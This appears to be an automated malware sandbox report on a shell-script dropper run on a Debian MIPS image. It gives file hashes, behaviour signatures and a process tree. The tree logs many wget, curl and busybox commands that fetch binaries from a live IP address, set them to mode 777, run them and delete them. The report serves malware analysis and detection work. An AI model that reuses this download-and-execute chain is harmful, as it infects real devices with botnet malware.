Analysis
-
max time kernel
67s -
max time network
69s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:12
Static task
static1
Behavioral task
behavioral1
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
-
Size
10KB
-
MD5
5ecd8e3f2eb51a7dc020f24e33b8cc57
-
SHA1
be4322853738933aa75ef6ade68437e1c6290afe
-
SHA256
19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f
-
SHA512
f43f15b94f1eab3f628a22d9dec691977126ced5801a808fc091f5847ab5cb1bf5bce49da1056fa82a1c14ccecddf1d0c76ecab6fcb74951c56b7c87a331dce1
-
SSDEEP
192:eyoVNmlHxyrasCqOpG+qpOVNmlHx3qOpG+0:e/VNmlRyrasH8VNmlRm
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh1⤵PID:703
-
/bin/rm/bin/rm bins.sh2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:712
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:722
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:732
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:735
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:736
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:737
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:738
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:739
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:740
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:741
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:742
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:743
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:745
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:748
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:769
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:776
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:778
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:783
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:793
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:799
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:805
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:808
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:814
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:820
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:836
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:843
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:848
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:857
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:865
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:866
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:870
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:871
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:874
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:877
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:878
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:879
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:880
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:881
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:882
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:883
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:884
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:885
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:886
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:887
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:888
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:889
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:890
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:891
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:892
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:893
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:894
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:895
-
-
/bin/chmodchmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- File and Directory Permissions Modification
PID:896
-
-
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵
- Executes dropped EXE
PID:897
-
-
/bin/rmrm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W2⤵PID:898
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:899
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:900
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:901
-
-
/bin/chmodchmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- File and Directory Permissions Modification
PID:902
-
-
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵
- Executes dropped EXE
PID:903
-
-
/bin/rmrm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS92⤵PID:904
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:905
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:906
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:907
-
-
/bin/chmodchmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- File and Directory Permissions Modification
PID:908
-
-
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵
- Executes dropped EXE
PID:909
-
-
/bin/rmrm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm2⤵PID:910
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:911
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Reads runtime system information
- Writes file to tmp directory
PID:912
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:913
-
-
/bin/chmodchmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA52⤵PID:916
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:917
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:919
-
-
/bin/chmodchmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵
- Executes dropped EXE
PID:921
-
-
/bin/rmrm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU2⤵PID:922
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:923
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:924
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:925
-
-
/bin/chmodchmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- File and Directory Permissions Modification
PID:926
-
-
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵
- Executes dropped EXE
PID:927
-
-
/bin/rmrm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf2⤵PID:928
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:929
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:931
-
-
/bin/chmodchmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- File and Directory Permissions Modification
PID:932
-
-
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:933
-
-
/bin/rmrm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO2⤵
- System Network Configuration Discovery
PID:934
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:935
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:937
-
-
/bin/chmodchmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p2⤵PID:940
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:941
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:943
-
-
/bin/chmodchmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX2⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:949
-
-
/bin/chmodchmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm2⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:955
-
-
/bin/chmodchmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs72⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:961
-
-
/bin/chmodchmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:967
-
-
/bin/chmodchmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:973
-
-
/bin/chmodchmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97